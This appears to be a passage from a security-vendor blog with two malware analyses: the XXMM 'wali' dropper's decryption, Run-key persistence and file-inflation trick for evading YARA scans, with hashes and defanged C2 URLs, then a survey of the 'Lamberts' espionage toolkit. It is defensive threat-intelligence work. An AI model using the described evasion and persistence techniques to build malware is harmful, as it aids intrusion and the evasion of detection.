The overlay data is generated by the wali dropper when the wali loader is installed onto the victim’s machine. The following figure shows the structure of malware components and how they are related to each other:

Fig. Structure of wali modules

Wali dropper1 checks the CPU architecture. If the CPU is 64-bit, this malware decrypts the 64-bit version of the wali loader from resource id 101. Otherwise, it decrypts the 32-bit version of the wali loader from resource id 102. To extract the resource data it uses RC4 with “12345” as the cryptokey, and LZNT1 to decompress the data after that. Dropper1 creates a file named “win${random4 chr}.tmp.bat” in the current temp directory from the decrypted wali dropper2 data. Finally, it appends generated garbage data to the overlay of the dropped file and runs wali dropper2

Wali dropper2 checks if the user account has admin privileges, and decrypts the wali loader using the same algorithm and the same key as of dropper1, and creating new files using the following file paths:

  • %ProgramFiles%\Common Files\System\Ole DB\srvhost.exe
  • %appdata%\Microsoft\Windows\Start Menu\Programs\srvhost.exe

It also appends generated garbage data to the overlay as well, using the same function. Finally, it creates a registry value of “sunUpdate” in  “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” to ensure malware persistence.

Generation of Junk Data

The feature to appending junk data to the malware executable to inflate the file size is quite unique to wali dropper1 and wali dropper2. We assume that by creating a large file the authors wanted to avoid AV detection, complicate sample exchange and stay below the radar of the most commonly used YARA rules. The function that generates the junk data is shown below:

Fig. Function to create junk data (create_garbage_data).

The create_garbage_data function generates a random byte in a loop with 1,000 iterations. In every iteration it fills blocks of data of random length within certain dynamically calculated limits. After that the result of create_garbage_data is written to the overlay of the decrypted wali loader and the process is repeated 100 times. This produces junk data of ~100MB which is appended to the executable.

Fig. Loop to append the junk data to overlay.

The size of one wali loader (MD5: d1e24c3cc0322b22988a1ce366d702e5) was initially 1,124,352 bytes. The function that appends garbage produced a new malware file in a real attack (MD5: 8bd0ddeb11518f3eaaddc6fd82627f33) and the file size was increased to 105,982,049 bytes.

As the appended junk data is created dynamically and depends on random values, the size of it may vary. We have seen 100MB files as well as 50MB samples used in real world attacks. The largest we observed was a 200MB malware sample created with the same trick. This technique currently doesn’t affect detection of the malware by Kaspersky Lab products. The malware is detected as:

  • Trojan.Win32.Xxmm
  • Trojan.Win64.Xxmm
  • Trojan-Downloader.Win32.Xxmm
  • Trojan-Downloader.Win64.Xxmm
  • Trojan-Dropper.Win32.Xxmm
  • Trojan-Dropper.Win64.Xxmm

Inflating file size with garbage data is not a completely new technique. Previously polymorphic viruses and worms used this technique a lot to mix original code with garbage data spread across the malware file, sometime increasing the file size by hundreds of kilobytes and even megabytes. Certain software protectors may also insert decoy files into packed files and inflate file size up to 1MB. We have also seen executable malwares disguised as movie files and ISO files spread over torrents, which in these cases, the malware size is inflated to a few gigabytes in order to mimic true content .

What is quite unique in using this method and appending junk data to a file is that in this case this technique is used in targeted attacks and is happening after the initial infection, during the later phases of attack with the intention of increasing file size to avoid detection.

While this technique may seem inefficient in its primitive approach to bypass detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan harddrives. The reason is that one of the common practices for YARA rule authors is to limit the size of scanned files, which is aimed mainly at improving performance of the scanning process. Large files, like the ones produced by XXMM malware, may become invisible for such rules, which is why we would like to recommend security researchers to consider this when creating rules for dropped malwares.

Indicators of Compromise

SHA256sum of samples

Wali dropper1:

  • 9b5874a19bf112832d8e7fd1a57a2dda180ed50aa4f61126aa1b7b692e6a6665

Wali dropper2:

  • da05667cd1d55fa166ae7bd95335bd080fba7b53c62b0fff248ce25c59ede54a
  • 10fca84ae22351356ead529944f85ef5d68de38024d4c5f6058468eb399cbc30

Wali loader + overlay:

  • 1f73d3a566ab7274b3248659144f1d092c8a5fc281f69aa71b7e459b72eb6db2
  • 24835916af9b1f77ad52ab62220314feea91d976fdacad6c942468e20c0d9ca1
  • 303c9fabf6cff78414cebee9873040aeb9dcf6d69962bd9e0bbe1a656376ed16
  • 3ffd5d3579bddbfd7136a6969c03673284b1c862129cfafe7a40beea1f56e790
  • 803a5a920684a5ab1013cb73bf8581045820f9fc8130407b8f81475d91ff7704
  • d2126d012de7c958b1969b875876ac84871271e8466136ffd14245e0442b6fac
  • d7b661754cae77aa3e77c270974a3fd6bda7548d97609ac174a9ca38ee802596
  • dc5e8c6488f7d6f4dcfac64f8f0755eb8582df506730a1ced03b7308587cdc41
  • f4a07e6dcb49cb1d819c63f17a8250f6260a944e6e9a59e822e6118fb1213031
  • ffd45bde777b112206b698947d9d9635e626d0245eb4cfc1a9365edc36614cbe

Wali loader:

  • a24759369d794f1e2414749c5c11ca9099a094637b6d0b7dbde557b2357c9fcd
  • b55b40c537ca859590433cbe62ade84276f3f90a037d408d5ec54e8a63c4ab31
  • c48a2077e7d0b447abddebe5e9f7ae9f715d190603f6c35683fff31972cf04a8
  • 725dedcd1653f0d11f502fe8fdf93d712682f77b2a0abe1962928c5333e58cae
  • cfcbe396dc19cb9477d840e8ad4de511ddadda267e039648693e7173b20286b1

C2 (compromised web sites) of wali:

  • hXXp://******essel[.]com/mt/php/tmpl/missing.php
  • hXXp://******essel[.]com/mt/mt-static/images/comment/s.php
  • hXXp://******hi[.]com/da******/hinshu/ki******/ki******.php
  • hXXp://******an[.]jp/_module/menu/menug/index.php
  • hXXp://******[.]jp/includes/firebug/index.php
  • hXXp://******[.]jp/phpmyadmin/themes/pmahomme/sprites.html
  • hXXp://******usai[.]com/ex-engine/modules/comment/queries/deleteComment.php
  • hXXp://******1cs[.]net/zy/images/patterns/preview/deleteComments.php
  • hXXp://******1cs[.]net/zy/images/colorpicker/s.php

Filename (over 50MB size):

  • srvhost.exe
  • propsyse.exe
  • perfcore.exe
  • oldb32.exe
  • oledb32.exe
  • javaup.exe

Unraveling the Lamberts Toolkit

Malware Alerts - Tue, 04/11/2017 - 05:59

Yesterday, our colleagues from Symantec published their analysis of Longhorn, an advanced threat actor that can be easily compared with Regin, ProjectSauron, Equation or Duqu2 in terms of its complexity.

Longhorn, which we internally refer to as “The Lamberts”, first came to the attention of the ITSec community in 2014, when our colleagues from FireEye discovered an attack using a zero day vulnerability (CVE-2014-4148). The attack leveraged malware we called ‘BlackLambert’, which was used to target a high profile organization in Europe.

Since at least 2008, The Lamberts have used multiple sophisticated attack tools against high-profile victims. Their arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools, and wipers. Versions for both Windows and OSX are known at this time, with the latest samples created in 2016.

Although the operational security displayed by actors using the Lamberts toolkit is very good, one sample includes a PDB path that points to a project named “Archan~1” (perhaps ‘Archangel’). The root folder on the PDB path is named “Hudson”. This is one of the very few mistakes we’ve seen with this threat actor.

While in most cases the infection vector remains unknown, the high profile attack from 2014 used a very complex Windows TTF zero-day exploit (CVE-2014-4148).

Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family. For more information please contact: intelreports@kasperskycom

An Overview of the Lamberts

Figure 1. Lamberts discovery timeline

The first time the Lambert family malware was uncovered publicly was in October 2014, when FireEye posted a blog about a zero day exploit (CVE-2014-4148) used in the wild. The vulnerability was patched by Microsoft at the same time. We named the malware involved ‘Black Lambert’ and described it thoroughly in a private report, available to Kaspersky APT Intel Reports subscribers.

The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.

Black Lambert White Lambert Implant type Active Passive toolType wl aa (“ArchAngel”) build 132914 113140 versionName 2.0.0 5.0.2

Internal configuration similarities in Black and White Lambert

White Lambert runs in kernel mode and intercepts network traffic on infected machines. It decrypts packets crafted in a special format to extract instructions. We named these passive backdoors ‘White Lambert’ to contrast with the active “Black Lambert” implants.

Looking further for any other malware related to White Lambert and Black Lambert, we came by another generation of malware that we called Blue Lambert.

One of the Blue Lambert samples is interesting because it appears to have been used as second stage malware in a high profile attack, which involved the Black Lambert malware.

Looking further for malware similar to Blue Lambert, we came by another family of malware we called Green Lambert. Green Lambert is a lighter, more reliable, but older version of Blue Lambert. Interestingly, while most Blue Lambert variants have version numbers in the range of 2.x, Green Lambert is mostly in 3.x versions. This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant. Perhaps both Blue and Green Lamberts have been developed in parallel by two different teams working under the same umbrella, as normal software version iterations, with one seeing earlier deployment than the other.

Signatures created for Green Lambert (Windows) have also triggered on an OS X variant of Green Lambert, with a very low version number: 1.2.0. This was uploaded to a multiscanner service in September 2014. The OS X variant of Green Lambert is in many regards functionally identical to the Windows version, however it misses certain functionality such as running plugins directly in memory.

Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. We called this new family Pink Lambert.

The Pink Lambert toolset includes a beaconing implant, a USB-harvesting module and a multi-platform orchestrator framework which can be used to create OS-independent malware. Versions of this particular orchestrator were found on other victims, together with White Lambert samples, indicating a close relationship between the White and Pink Lambert malware families.

By looking further for other undetected malware on victims of White Lambert, we found yet another apparently related family. The new family, which we called Gray Lambert is the latest iteration of the passive network tools from the Lamberts’ arsenal. The coding style of Gray Lambert is similar to the Pink Lambert USB-harvesting module, however, the functionality mirrors that of White Lambert. Compared to White Lambert, Gray Lambert runs in user mode, without the need for exploiting a vulnerable signed driver to load arbitrary code on 64-bit Windows variants.

Connecting all these different families by shared code, data formats, C&C servers, and victims, we have arrived at the following overarching picture:

Figure 2. An overview of connections between the Lambert families

The Lamberts in Brief – from Black to Gray

Below, we provide a small summary of all the Lamberts. A full description of all variants is available to subscribers of Kaspersky APT Reports. Contact

Black Lambert

The only known sample of Black Lambert was dropped by a TTF-exploit zero day (CVE-2014-4148). Its internal configuration included a proxy server which suggests the malware was created to work in a very specific network configuration, inside the victim’s network.

An internal description of Black Lambert indicates what appears to be a set of markers used by the attackers to denote this particular branch: toolType=wl, build=132914, versionName = 2.0.0.

Hash Description 683afdef710bf3c96d42e6d9e7275130 generic loader (hdmsvc.exe) 79e263f78e69110c09642bbb30f09ace winlib.dll, final payload (toolType=wl) Blue Lambert

The Blue Lambert implants contain what appear to be version numbers in the 2.x range, together with project/operation codename sets, which may also indicate codenames for the victims or campaigns.

Figure 4. Blue Lambert configuration in decrypted form, highlighting internal codenames


Green Lambert

Green Lambert is a family of tools deeply related to Blue Lambert. The functionality is very similar, both Blue and Green are active implants. The configuration data shares the same style of codenames for victims, operations, or projects.

Figure 5. Green Lambert configuration block (decrypted) highlighting internal codenames

The Green Lambert family is the only one where non-Windows variants have been found. An old version of Green Lambert, compiled for OS X was uploaded from Russia to a multiscanner service in 2014. Its internal codename is HO BO (1.2.0).

The Windows versions of Green Lambert have the following code names: BEARD BLUE (2.7.1), GORDON FLASH (3.0), APE ESCAPE (3.0.2), SPOCK LOGICAL (3.0.2), PIZZA ASSAULT (3.0.5), and SNOW BLOWER (3.0.5).

Interestingly, one of the droppers of Green Lambert abused an ICS software package named “Subway Environmental Simulation Program” or “SES”, which has been available on certain forums visited by engineers working with industrial software. Similar techniques have been observed in the past from other threat groups, for instance, trojanized Oracle installers by the Equation group.

White Lambert

White Lambert is a family of tools that share the same internal description as Black Lambert. Known tool types, builds, and version names include:

  • ToolType “aa”, protocol 3, version 7, versionName 5.0.2, build 113140
  • ToolType “aa”, protocol 3, version 7, versionName 5.0.0, build 113140
  • ToolType “aa”, protocol 3, version 6, versionName 4.2.0, build 110836M
  • ToolType “aa”, protocol 3, version 5, versionName 3.2.0

One of the White Lambert samples is interesting because it has a forgotten PDB path inside, which points to “Archan~1l” and “Hudson”. Hudson could point to a project name, if the authors name their projects by rivers in the US, or, it could also be the developer’s first name. The truncated (8.3) path “archan~1” most likely means “Archangel”. The tool type “aa” could also suggest “ArchAngel”. By comparison, the Black Lambert tool type “wl” has no known meaning.

White Lambert samples run in kernel mode and sniff network traffic looking for special packets containing instructions to execute. To run unsigned code in kernel mode on 64-bit Windows, White Lambert uses an exploit against a signed, legitimate SiSoftware Sandra driver. The same method was used before by Turla, ProjectSauron, and Equation’s Grayfish, with other known, legitimate drivers.

Pink Lambert

Pink Lambert is a suite of tools initially discovered on a White Lambert victim. It includes a beaconing implant, partially based on publicly available source code. The source code on top of which Pink Lambert’s beaconing implant was created is “A Fully Featured Windows HTTP Wrapper in C++”.

Figure 6. “A Fully Featured Windows HTTP Wrapper” by shicheng

Other tools in the Pink Lambert suite include USB stealer modules and a very complex multi-platform orchestrator.

In a second incident, a Pink Lambert orchestrator was found on another White Lambert victim, substantiating the connection between the Pink and White Lamberts.

Gray Lambert

Gray Lambert is the most recent tool in the Lamberts’ arsenal. It is a network-driven backdoor, similar in functionality to White Lambert. Unlike White Lambert, which runs in kernel mode, Gray Lambert is a user-mode implant. The compilation and coding style of Gray Lambert is similar to the Pink Lambert USB stealers. Gray Lambert initially appeared on the computers of victims infected by White Lambert, which could suggest the authors were upgrading White Lambert infections to Gray. This migration activity was last observed in October 2016.

Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice.


Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block: a hostname and an IP address. Using our own pDNS as well as DomainTools IP history, we plotted the times when the C&C servers were active and pointing to the same IP address as the one from the configuration block.

Unfortunately, this method doesn’t work for all samples, since some of them don’t have a domain for C&C. Additionally, in some cases we couldn’t find any pDNS information for the hostname configured in the malware.

Luckily, the attackers have made a few mistakes, which allow us to identify the activity times for most of the other samples. For instance, in case when no pDNS information was available for a subdomain on top of the main C&C domain, the domain registration dates were sufficient to point out when the activity began. Additionally, in some cases the top domain pointed to the same IP address as the one from the configuration file, allowing us to identify the activity times.

Another worthwhile analysis method focuses on the set of Blue Lambert samples that have exports. Although most compilation timestamps in the PE header appear to have been tampered (to reflect a 2003-2004 range), the authors forgot to alter the timestamps in the export section. This allowed us to identify not just the activity / compilation timestamps, but also the method used for faking the compilation timestamps in the PE header.

It seems the algorithm used to tamper with the samples was the following: subtract 0x10 from the highest byte of timestamp (which amounts to about 8 and half years) and then randomize the lowest 3 bytes. This way we conclude that for Blue Lamberts, that original compilation time of samples was in the range of 2012-2015.

Putting together all the various families, with recovered activity times, we come to the following picture:

Figure 8. A timeline of activity for known Lamberts

As it can be seen from the chart above, Green Lambert is the oldest and longest-running in the family, while Gray is the newest. White, Blue and Pink somehow overlap in deployment, with Blue replacing Green Lambert. Black Lambert was seen only briefly and we assume it was “retired” from the arsenal after being discovered by FireEye in 2014.

Codenames and Popular Culture Referenced in Lamberts

The threat group(s) behind the Lambert toolkits have used a large number of codenames extensively throughout their projects. Some of these codenames are references to old computer games, Star Trek, and cartoons, which is very unusual for high profile APT groups. We really enjoyed going through the backstories of these codenames and wanted to provide them below for others to enjoy as well.

For instance, one of the Green Lambert versions has the internal codename “GORDON FLASH”, which can also be read as “FLASH GORDON”. Flash Gordon is the hero of a space opera adventure comic strip created by and originally drawn by Alex Raymond. It was first published in 1934 and subsequently turned into a popular film in 1980.

Flash Gordon poster

A ‘Funnel cake’ is a regional food popular in North America at carnivals, fairs, sporting events, and seaside resorts. This explains the codename “FUNNELCAKE CARNIVAL”:

Figure 9. A typical funnel cake

Spock and Prosper obviously refers to Star Trek, the well-known science fiction television series created by Gene Roddenberry. Cdr. Spock is a half-Vulcan, half-human character, portrayed by Leonard Nimoy. “Live long and prosper” is the traditional Vulcan greeting in the series.

Leonard Nimoy as “Spock” displaying the traditional Vulcan greeting “Live long and prosper”

Ringtoss is a game that is very popular at carnivals in North America.

DOUBLESIDED SCOOBYSNACK is likely a reference to an NFL Lip Reading video featuring Adrian Peterson that went viral in mid-2013. According to the urban dictionary, it is also used to denote a sexual game in which the participants are dressed as Scooby-Doo and his master.

Ape Escape (also known as Saru Get You (サルゲッチュ Saru Getchu) in Japan) is a series of video games made by SCE Japan Studio, starting with Ape Escape for PlayStation in 1999. The series often incorporates ape-related humor, unique gameplay, and a wide variety of pop culture references; it is also notable for being the first game to make the DualShock or Dual Analog controller mandatory.

Ape Escape

INVERTED SHOT is likely a reference to a mixed martial arts move also known as an ‘Imanari roll takedown’, named after Masakazu Imanari who popularized the grappling technique. It consists of a modified Brazilian jiu-jitsu granby roll that places the fighter in inverted guard position while taking the opponent down to the mat.

GAI and SHU (as used in Green Lambert OS X) are characters from the Guilty Crown anime series. Gai Tsutsugami (恙神 涯 Tsutsugami Gai) is the 17-year-old resourceful and charismatic leader of the “Funeral Parlor” resistance group, while Shu Ouma (桜満 集 Ōma Shū) is the 17-year-old main protagonist of Guilty Crown.

Figure 10. Main characters of Guilty Crown with Shu Ouma in the middle.


The Lamberts toolkit spans across several years, with most activity occurring in 2013 and 2014. Overall, the toolkit includes highly sophisticated malware, which relies on high-level techniques to sniff network traffic, run plugins in memory without touching the disk, and leverages exploits against signed drivers to run unsigned code on 64-bit Windows.

To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit, deployment of Black Lambert included a rather sophisticated TTF zero day exploit, CVE-2014-4148. Taking that into account, we classify the Lamberts as the same level of complexity as Regin, ProjectSauron, Equation and Duqu2, which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed.

Considering the complexity of these projects and the existence of an implant for OS X, we assume that it is highly possible that other Lamberts also exist for other platforms, such as Linux. The fact that in the vast majority of cases the infection method is unknown probably means there are still a lot of unknown details about these attacks and the group(s) leveraging them.

As usual, defense against attacks such as those from the Lamberts/Longhorn should include a multi-layered approach. Kaspersky products include special mitigation strategies against the malware used by this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:

We will continue tracking the Lamberts and sharing new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.

Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family.

For more information about the Lamberts, please contact: